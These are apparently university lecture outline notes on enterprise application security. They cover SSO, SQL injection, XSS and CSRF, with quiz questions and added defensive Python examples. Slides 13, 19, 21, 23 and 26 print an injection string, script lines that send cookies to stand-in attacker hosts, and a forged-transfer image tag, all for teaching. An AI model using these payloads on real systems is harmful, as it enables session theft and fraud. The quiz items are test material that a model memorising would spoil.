
Building Enterprise Applications: Security Issues Outline notes only

  1. Building Enterprise Applications: Security Issues (outline notes only)

  2. Security issues: General
  • A huge topic that we can only touch on; it is also addressed elsewhere in the module
  • Any platform must support six key security aspects (revision):
    • Authentication (and mutual authentication)
    • Authorisation
    • Data confidentiality
    • Data integrity
    • Non-repudiation
    • Auditing
  CS37420: Security Issues

  3. What is authentication? (Choose the most accurate option)
  • Provision of a subject’s identity and private security attributes to a system to enable that subject entry into that system
  • The process of deciding whether a subject is allowed to access a specific server-side resource based on their security role

  4. What is authorisation? (Choose the most accurate option)
  • Provision of a subject’s identity and private security attributes to a system to enable that subject entry into that system
  • The process of deciding whether a subject is allowed to access a specific server-side resource based on their security role

  5. What is data confidentiality? (Choose all that apply)
  • Having confidence that data is accurate
  • Ensuring that sensitive data sent across the network can only be read by the intended receiver
  • Ensuring that sensitive data that is stored can only be read by those allowed to do so
  • Another answer

  6. In the context of distribution, how might data integrity be maintained? (Choose all that apply)
  • The use of security mechanisms to prevent malicious tampering with data in transit
  • The use of security mechanisms to prevent malicious tampering with data stored on the server
  • The use of security mechanisms to prevent accidental corruption of data in transit

  7. In the context of enterprise applications, what does non-repudiation mean? (Choose the most accurate)
  • Neither the end user nor the application owner can deny that the user who accessed an application service did not use that service
  • The application owner has a record of business transactions so that the owner can prove that a service has been used by a particular user

  8. Security: Single sign-on
  • Purpose is to avoid the need to repeatedly request credentials from end users when they use a set of services, e.g. a set of services offered on a portal web site
  • The end user is prompted once for credentials and authenticated by the primary security domain, which then communicates with the other, secondary security domains

  9. Security: Single sign-on
  • Reduces time taken by end users
  • Removes the need for an end user to maintain multiple sets of credentials
  • Easier for administrators to manage user accounts and user authorisation rights
  • Requires secure lines of trust between the integrated services, and therefore allows for interoperability that would otherwise be difficult if not impossible

  10. Solution: End user authenticates once during the login session
  • When the user accesses other applications that participate in SSO, they check against the primary authentication service to see whether the user is authenticated and what the user’s authorisation rights are
  • One way this is achieved on the web is to return a token as a cookie
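The token-as-cookie approach from this slide, as an added example that is not part of the lecture notes: the primary domain signs the claims (identity, authorisation rights, expiry) with HMAC so that a secondary domain can accept the cookie without re-prompting for credentials, and rejects anything forged or expired. The shared secret and the 900-second lifetime are constructed placeholders.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed secret shared by the primary domain and the SSO participants;
# a placeholder for this example, not a key from any real deployment.
SSO_SECRET = b"placeholder-shared-secret"
TOKEN_TTL_SECONDS = 900   # constructed lifetime for the login-session token


def _sign(payload_b64: bytes) -> bytes:
    return hmac.new(SSO_SECRET, payload_b64, hashlib.sha256).digest()


def issue_token(user, roles, now=None):
    """Primary security domain: after the single credential prompt, mint a
    cookie value carrying who the user is, their authorisation rights and
    an expiry, signed so that no other party can alter those claims."""
    now = time.time() if now is None else now
    claims = {"sub": user, "roles": roles, "exp": int(now) + TOKEN_TTL_SECONDS}
    payload_b64 = base64.urlsafe_b64encode(json.dumps(claims).encode())
    sig_b64 = base64.urlsafe_b64encode(_sign(payload_b64))
    return (payload_b64 + b"." + sig_b64).decode()


def verify_token(token, now=None):
    """Secondary domain: instead of asking for credentials again, check the
    token presented as a cookie. Returns the claims, or None if the token is
    malformed, forged or expired (always a reject, never a fall-through)."""
    now = time.time() if now is None else now
    try:
        payload_b64, sig_b64 = token.encode().split(b".", 1)
        sig = base64.urlsafe_b64decode(sig_b64)
    except ValueError:  # no separator, or signature is not valid base64
        return None
    # Constant-time comparison: the check must not leak how many bytes matched
    if not hmac.compare_digest(sig, _sign(payload_b64)):
        return None
    claims = json.loads(base64.urlsafe_b64decode(payload_b64))
    if claims.get("exp", 0) <= now:
        return None
    return claims
```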

  11. Standards in this area: SAML (Security Assertion Markup Language)
  • Important implementation: Shibboleth (discussed briefly in class)

  12. Security: SQL injection attacks
  • Unwanted injection of SQL into an enterprise application by attackers in order to obtain confidential data or compromise the database’s integrity
  • Can happen in any computer language that constructs a SQL statement from string literals and incoming data that contains SQL meta (e.g. escape) characters

  13. Security: SQL injection attacks

      statement = "SELECT * FROM emails WHERE uid = '" + uid + "'"

  and then inserting the data:

      cwl' or 't' = 't

  giving:

      statement = "SELECT * FROM emails WHERE uid = 'cwl' or 't' = 't'"

  14. Two case studies discussed in class
  • Netbeans based Java examples looked at in class

  15. Security: SQL injection attacks
  • Techniques to help address this:
    • Use functions/methods to quote all meta characters so that they are not interpreted as meta characters in SQL statements
    • Use SQL statement parameterisation where supported (e.g. Java prepared statements)
    • Use stored procedures rather than constructing SQL on the fly
    • Validate all user input!
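The concatenated statement from slide 13 beside the parameterised form recommended here, as an added example (not the Netbeans case studies from the class): the same input from the slide returns the whole table through string concatenation and nothing through a bound parameter. The in-memory SQLite table and its three rows are constructed for the example; the DB-API `?` placeholder plays the role of a Java prepared statement.

```python
import sqlite3

# Constructed sample rows so the example runs offline; uids and addresses are made up.
ROWS = [("cwl", "cwl@example.org"), ("abc", "abc@example.org"), ("xyz", "xyz@example.org")]

# The injected input exactly as given on slide 13
INJECTED = "cwl' or 't' = 't"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE emails (uid TEXT, email TEXT)")
    conn.executemany("INSERT INTO emails VALUES (?, ?)", ROWS)
    return conn


def lookup_concatenated(conn, uid):
    """The vulnerable pattern from slide 13: the statement is assembled from string
    literals and incoming data, so a quote in uid ends the literal and the rest of
    the input is parsed as SQL (here: ... WHERE uid = 'cwl' or 't' = 't')."""
    statement = "SELECT * FROM emails WHERE uid = '" + uid + "'"
    return conn.execute(statement).fetchall()


def lookup_parameterised(conn, uid):
    """Parameterised statement: the SQL text is fixed and uid is bound as a value,
    so the quote characters are data, never syntax. Equivalent in intent to a
    Java PreparedStatement with setString()."""
    return conn.execute("SELECT * FROM emails WHERE uid = ?", (uid,)).fetchall()


def count_rows(lookup, uid):
    """Run one lookup against a fresh database and report how many rows came back."""
    conn = make_db()
    try:
        return len(lookup(conn, uid))
    finally:
        conn.close()


if __name__ == "__main__":
    print(count_rows(lookup_concatenated, "cwl"))       # 1: the intended row
    print(count_rows(lookup_concatenated, INJECTED))    # 3: every row leaks
    print(count_rows(lookup_parameterised, INJECTED))   # 0: no uid equals the payload text
```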

  16. Security: Cross-site scripting (XSS) attacks
  • Attackers find clever ways of injecting malicious script (usually JavaScript) into web pages served by other domains, allowing access to sensitive data associated with those pages (e.g. cookie data)
  • The following slides describe two basic kinds of XSS attack

  17. Security: Cross-site scripting (XSS) attacks
  • Reflective/Non-persistent XSS:
    • Most common type of attack
    • HTML sent to the server is not validated and is used as part of the results sent back to the client, possibly containing malicious script code
    • Requires social engineering to trick a user into following a “malicious” link to a rogue site
    • See www.xssed.com/archive for examples of real sites that interpret JS embedded in URLs
    • Example that takes advantage of the echo service vulnerability shown on the next slide:

  18. XSS example (parties: end user browser, http://scoundrel.com, http://target.com)
  1: End user is tricked into visiting http://scoundrel.com
  2: HTTP response from scoundrel.com is:

       <form action="http://target.com:7" method="post">
         <input type="submit" onClick="some JS">
       </form>

  3: The form is sent to the echo server on target.com, port 7
  4: The echo server echoes back the form HTML along with the target.com cookies that the JavaScript can access
  Make sure the echo service is disabled on the HTTP server!

  19. Security: Cross-site scripting (XSS) attacks
  • Stored/Persistent XSS (defined by example):
    • Un-validated client feedback data including HTML with a malicious script is stored in a server-side database
    • At a later date an administrator logs in and displays the feedback on her browser
    • The script is run and sends the administrator’s cookie data to a different site:

        <script>
          document.location = "http://scoundrel.domain/capture/" + document.cookie
        </script>

  20. Persistent XSS example (parties: User Browser, Admin Browser, http://naive.com with /feedback and /admin servlets, http://scoundrel.com with /capture servlet)
  1: HTTP request from the user browser to the /feedback servlet on naive.com
  2: HTTP response: feedback form
  3: HTTP request: feedback data containing JavaScript
  4: /feedback servlet stores the data in the feedback table
  5: HTTP request from the admin browser to the /admin servlet
  6: /admin servlet reads from the feedback table
  7: HTTP response: feedback data including the JavaScript; the admin’s cookies are also available to it
  8: HTTP request: the JS redirects to /capture on scoundrel.com with the cookie info appended
  9: HTTP response: /capture reads the cookie data from the end of the URL and sends it back as part of the HTML
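The /admin servlet rendering step (6 and 7 above) in both its vulnerable and its hardened form, as an added example that is not part of the lecture notes: output encoding at render time turns the stored payload from slide 19 into inert text, and an HttpOnly session cookie (a control the slides do not mention) keeps the cookie out of document.cookie even if some script does run. The feedback entries and the cookie name SESSIONID are constructed.

```python
import html

# Constructed feedback entries as they would sit in the feedback table;
# the last one carries the payload shown on slide 19.
FEEDBACK = [
    "Great service, thanks.",
    "The login page is slow on Mondays.",
    '<script>document.location="http://scoundrel.domain/capture/" + document.cookie</script>',
]


def render_raw(entries):
    """The /admin servlet pattern the slide warns about: stored feedback is
    placed into the page unchanged, so stored markup is parsed, and stored
    script executed, in the administrator's browser."""
    return "<ul>" + "".join("<li>" + e + "</li>" for e in entries) + "</ul>"


def render_escaped(entries):
    """Same page with output encoding: <, >, &, double and single quotes become
    entities, so the browser displays the stored text instead of executing it.
    Encoding at render time also covers rows stored before validation was added."""
    return "<ul>" + "".join("<li>" + html.escape(e, quote=True) + "</li>" for e in entries) + "</ul>"


def session_cookie_header(session_id):
    """Defence in depth for the cookie the script targets: HttpOnly keeps the
    cookie out of document.cookie, so even a script that does run cannot read
    it; Secure stops the browser sending it over plain HTTP."""
    return "Set-Cookie: SESSIONID=" + session_id + "; Path=/; HttpOnly; Secure"


def contains_executable_script(page):
    """Crude marker used only to contrast the two renderings: an unescaped
    <script tag present in the served HTML."""
    return "<script" in page.lower()
```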

  21. Security: Cross-site request forgery attacks
  • XSS exploits the trust a user has for a particular site...
  • XSRF exploits the trust a site has in a user’s browser
  • E.g. hidden image tag with form:

        <img src="http://mybank.com/transfer?from=myaccount&to=attackersAccount">

  22. XSRF
  • Assumptions:
    • There is a site, e.g. mybank.com, that can be used to provide some benefit to the attacker, e.g. transfer of funds
    • The site does not check the HTTP Referer header to confirm that the request follows a link from the same site
    • The user is logged on to the site whilst browsing other sites
    • The attacker is able to determine the correct values to send in the attack, e.g. the items in the URL request such as the from and to bank accounts, or the contents of a form submission
    • The victim is tricked into viewing content that includes a link such as the one on the previous slide, e.g. viewing content on a social network site
    • The operation proceeds without the knowledge of the victim
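The Referer check whose absence this slide lists, plus a per-session form token, as an added example that is not part of the lecture notes: the hidden image request from slide 21 arrives with the victim's cookies but with another site's Referer and no token, so both checks reject it. SITE_ORIGIN, the header and form dictionaries and the session store are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the protected site from the slide's example (https assumed here)
SITE_ORIGIN = "https://mybank.com"


def issue_csrf_token(session):
    """When the transfer form is served: store a fresh random token in the
    server-side session and embed the same value in the form as a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def referer_is_same_site(headers):
    """The check the slide's vulnerable site omits. Only scheme and host are
    compared, so a lookalike host such as mybank.com.evil.example is rejected.
    A missing Referer is treated as a reject (an assumption of this example)."""
    parts = urlsplit(headers.get("Referer", ""))
    if not (parts.scheme and parts.netloc):
        return False
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def is_valid_transfer(headers, form, session):
    """Accept the state-changing request only if it comes from our own pages AND
    carries this session's token. A hidden <img src=...> on another site makes
    the browser attach the victim's cookies automatically, but it has neither."""
    if not referer_is_same_site(headers):
        return False
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # Constant-time compare so the token cannot be recovered by timing guesses
    return bool(expected) and hmac.compare_digest(expected.encode(), supplied.encode())
```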

  23. Study the following SQL code.

      "SELECT * FROM emails WHERE email = '" + emailStr + "'"

  The “+” operator concatenates strings. The intention of the programmer is to allow the browser user to input an email identifier that causes a database lookup returning data about the user represented by that email. Assume that the variable emailStr contains the string:

      cwl@aber.ac.uk' or 't' = 't

  What database result will be generated by this query?
  • A copy of the database row for cwl
  • No data will be returned because the input data is badly formed
  • All rows in the emails table are returned

  24. A reflected XSS attack is achieved by (choose all that apply):
  • Uploading HTML with JavaScript to a server which is then saved and accessed and reflected on a browser during a later session
  • An HTTP request containing JavaScript is included in the HTTP response results
  • Tricking a user using a phishing attack to click on a URL

  25. True or False: Validating user input in the browser is both a good idea and sufficient

  26. As part of a stored XSS attack the browser receives back a page of HTML containing:

      <script>window.location = "http://scoundrel.com:8080/Scoundrel/capture/" + document.cookie.replace(";", "");</script>

  What happens in the receiver’s browser?
  • The browser makes an HTTP request to scoundrel.com that contains the current page’s cookies as part of the request. The user is unaware that the request occurred
  • The browser makes an HTTP request to scoundrel.com that contains the current page’s cookies as part of the request. The user is aware that the request occurred

  27. For XSRF (cross-site request forgery) to succeed, at least the following conditions must apply (choose all that apply):
  • Social engineering is used to trick the user into visiting the attacker’s web site
  • JavaScript must be switched on
  • The attacked site fails to validate the Referer request header
  • There are operations exposed by the attacked enterprise application that do something useful or profitable for the attacker
  • The attacker can determine the parameters and their values required by the operations being targeted
